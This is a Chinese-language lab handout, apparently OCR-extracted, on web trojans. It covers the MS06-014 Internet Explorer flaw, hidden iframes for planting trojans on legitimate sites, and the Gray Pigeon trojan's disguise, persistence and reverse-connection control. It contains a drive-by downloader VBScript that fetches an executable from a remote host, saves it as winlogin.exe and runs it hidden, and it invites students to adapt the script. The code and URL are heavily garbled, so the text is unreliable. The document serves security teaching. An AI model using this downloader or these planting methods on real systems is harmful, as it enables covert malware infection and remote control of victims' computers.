網(wǎng)頁木馬實驗原理

網(wǎng)頁木馬原理及相關(guān)定義瀏覽器是用來解釋和顯示萬維網(wǎng)文檔的程序，已經(jīng)成為用戶上網(wǎng)時必不可少的工具之一。“網(wǎng)頁木馬”由其植入方式而得名，是通過瀏覽網(wǎng)頁的方式被植入到被控主機上，并對被控主機進行控制。與其它網(wǎng)頁不同，木馬網(wǎng)頁是黑客精心制作的，木馬網(wǎng)頁是黑客精心制作的，用戶一旦訪問了該網(wǎng)頁就會中木馬。為什么說是黑客精心制作的呢？因為嵌入在這個網(wǎng)頁中的腳本恰如其分地利用了IE瀏覽器的漏洞，讓IE在后臺自動下載黑客放置在網(wǎng)絡(luò)上的木馬并運行（安裝）這個木馬，也就是說，這個網(wǎng)頁能下載木馬到本地并運行（安裝）下載到本地電腦上的木馬，整個過程都在后臺運行，用戶一旦打開這個網(wǎng)頁，下載過程和運行（安裝）過程就自動開始。如果打開一個網(wǎng)頁，IE瀏覽器真的能自動下載程序和運行程序嗎？如果IE真的能肆無忌憚地任意下載和運行程序，那么用戶將會面臨巨大的威脅。實際上，為了安全，IE瀏覽器是禁止自動下載程序特別是運行程序的，但是，IE瀏覽器存在著一些已知和未知的漏洞，網(wǎng)頁木馬就是利用這些漏洞獲得權(quán)限來下載程序和運行程序的。本練習(xí)中，我們利用微軟的MS06014漏洞，完成網(wǎng)頁木馬的植入。名詞解釋MS06014漏洞MS06014漏洞存在于MicrosoftDataAccessComponents,利用微軟的HTMLObject標簽的一個漏洞，Object標簽主要是用來把ActiveX控件插入到HTML頁面里。由于加載程序沒有根據(jù)描述遠程Object數(shù)據(jù)位置的參數(shù)檢查加載文件的性質(zhì)，因此Web頁面里面的程序就會不經(jīng)過用戶的確認而自動執(zhí)行。iframe標簽iframe也叫浮動幀標簽，它可以把一個HTML網(wǎng)頁嵌入到另一個網(wǎng)頁里實現(xiàn)“畫中畫”的效果。例如:|<iframesrc=^http://ww.jlcss.con/irides,htmVname=，vjlcss"vidth="CTheight="CTframeticirder="CT>被嵌入的網(wǎng)頁可以控制寬、高以及邊框大小和是否出現(xiàn)滾動條等。如果把寬（width）、高（height）、邊框（frameborder）都設(shè)置為了“0”，代碼插入到首頁后，首頁不會發(fā)生變化，但是嵌入的網(wǎng)頁實際上已經(jīng)打開。反彈端口型木馬分析防火墻的特性后可以發(fā)現(xiàn)，防火墻對于連入的鏈接往往會進行非常嚴格的過濾，但是對于連出的鏈接卻疏于防范。于是，與一般的木馬相反，反彈端口型木馬的服務(wù)端（被控制端）使用主動端口，客戶端（控制端）使用被動端口。木馬定時監(jiān)測控制端的存在，發(fā)現(xiàn)控制端上線后立即彈出端口主動連接控制端打開的被動端口。服務(wù)端通常會把打開的端口偽裝成應(yīng)用軟件的端口，從而進一步降低被防火墻發(fā)現(xiàn)的概率。網(wǎng)頁木馬生成腳本通常網(wǎng)頁木馬是通過“網(wǎng)馬生成器”將木馬安裝程序的下載地址附加在網(wǎng)頁上的，進而達到用戶瀏覽含有木馬的網(wǎng)頁即自動下載安裝程序的目的。下面給出一個“網(wǎng)馬生成器”腳本，其中“//”后面的文字是對代碼的注釋。實驗中，同學(xué)們改動此腳本，自己動手生成網(wǎng)頁木馬。<html>作<scriptlanguage^VBScript17>onerrorresumenextdl="http:/7呈僉抒1妣屢：9090/Server_Settp.eKe" 定義"dl”為木馬下載地址Setdf=document.createElementobject") /7M立一個對彝df.setAttribute"classid^"clsid:BD5.6.C55 5A3-1ID 3At.Q.QC04FC29E36"”聲明網(wǎng)馬的clsidstr="Microsoft.KMLHTTP" 使用KMLhttp對象Setk=df.CreateObject(str^strl=Adodb.StreamsetS=df.createobject(strlj"") //用Adodb.Stream執(zhí)行文件操S.type=1池AGETk.Openstr2jdl.Falsek.Sendfname^",winlogin.eze"/V使用睛t力可狹取不與乂1干/V根據(jù)木馬地址荻取木馬文件/V定義木馬的文件名//用FileSystemObjec執(zhí)行文件操作，這次是寫入文件setF=df.createobject("Scripting.FileSystemObjectsettmp=F.GetSpecialFolder(2) /y缺取臨時文件夾路徑fname1=F.BuildPath(tmpjfname1)S.openS.writek.responseBodj^ "向臨時文件夾中寫入木馬S.savetofilefnanelj2 //保存木馬文件S.close 〃關(guān)閉連接setQ=df.createobject("Shell.J^iplication"http://用Shell.Application運行木馬文件Q.SheIIEkscutefnamelj111111H30</script></html>/V以隱藏方式運行木馬木馬的工作過程木馬的工作過程按過程可分為四部分：木馬的植入、木馬的安裝、木馬的運行和木馬的自啟動。木馬的植入因為網(wǎng)頁木馬就是一個由黑客精心制作的含有木馬的HTML網(wǎng)頁，因為MS06014漏洞存在，當用戶瀏覽這個網(wǎng)頁時就被在后臺自動安裝了木馬的安裝程序。所以黑客會千方百計的誘惑或者欺騙人們?nèi)ゴ蜷_他所制作的網(wǎng)頁，進而達到植入木馬的目的。不過隨著人們網(wǎng)絡(luò)安全意識的提高，這種方法已經(jīng)很難欺騙大家了。還有一種方法就是通過＜iframe＞標簽，在一個正常網(wǎng)站的主頁上鏈接網(wǎng)頁木馬。瀏覽者在瀏覽正常的網(wǎng)站主頁時，iframe語句就會鏈接到含有木馬的網(wǎng)頁，網(wǎng)頁木馬就被悄悄植入了。這種方法就是大家經(jīng)常說的“掛馬”，而中了木馬的主機通常被幽默的稱作“肉雞”?！皰祚R”因為需要獲取網(wǎng)站管理員的權(quán)限，所以難度很大。不過他的危害也是十分巨大的，如果黑客獲得了一個每天流量上萬的知名網(wǎng)站的管理員權(quán)限并成功“掛馬”，那試想他會有多少“肉雞”。木馬的安裝木馬的安裝在木馬植入后就被立即執(zhí)行。（本練習(xí)以灰鴿子木馬程序為例）當網(wǎng)頁木馬植入后，木馬會按照通過網(wǎng)頁木馬腳本中指向的路徑下載木馬服務(wù)端安裝程序，并根據(jù)腳本中的設(shè)定對安裝程序進行重命名。通常會重新命名一個與系統(tǒng)進程相近的名字（本實驗中為winlogin.exe）來迷惑管理員，使安裝的過程及其留下的痕跡不通過細心查看不易被發(fā)覺。安裝程序下載完成后，自動進行安裝。生成可執(zhí)行文件C:\Windows\.ini，并修改注冊表生成名為windowsXPVista的系統(tǒng)服務(wù)。其中.ini就是木馬服務(wù)器程序，隱藏在背后的主謀。木馬的運行灰鴿子木馬服務(wù)器安裝完成后就會立刻連接網(wǎng)絡(luò)尋找其客戶端，并與其建立連接。這時木馬程序會將自己的進程命名為IEXPLORE.EXE，此進程與Windows的IE瀏覽器進程同名，同樣是為了迷惑管理員來偽裝自己。當木馬服務(wù)端與客戶端建立連接后，客戶端就如同擁有了管理員權(quán)限一樣，可隨意對“肉雞”進行任何操作。木馬的自啟動木馬安裝時生成系統(tǒng)服務(wù)WindowsXPVista。WindowsXPVista的可執(zhí)行文件路徑：“C:\WINDOWS\H.inio”描述：“灰鴿子服務(wù)端程序，遠程監(jiān)控管理?！眴宇愋停骸白詣印！焙苊黠@可以看出灰鴿子是通過此系統(tǒng)服務(wù)執(zhí)行.ini文件來自啟動木馬服務(wù)器。存在與系統(tǒng)目錄下的H.ini文件被設(shè)置成一個隱藏的受保護的操作系統(tǒng)文件，很難被人發(fā)現(xiàn)。木馬的功能下面簡要的介紹一下木馬的基本功能。反向連接：由木馬的“服務(wù)器程序”主動發(fā)起連接，這種連接方式也稱為“反彈木馬”，它的優(yōu)點是可以突破NAT和防火墻。文件管理：可以操作(查看、新建、刪除等)被控主機的文件系統(tǒng)及上傳下載文件。注冊表管理：可以操作(查看、新建、刪除等)被控主機的注冊表項。系統(tǒng)信息查看：可以查看被監(jiān)控主機的系統(tǒng)配置信息等。剪貼板查看：可以查看被監(jiān)控主機的剪貼板內(nèi)容。進程管理：可以查看被監(jiān)控主機的進程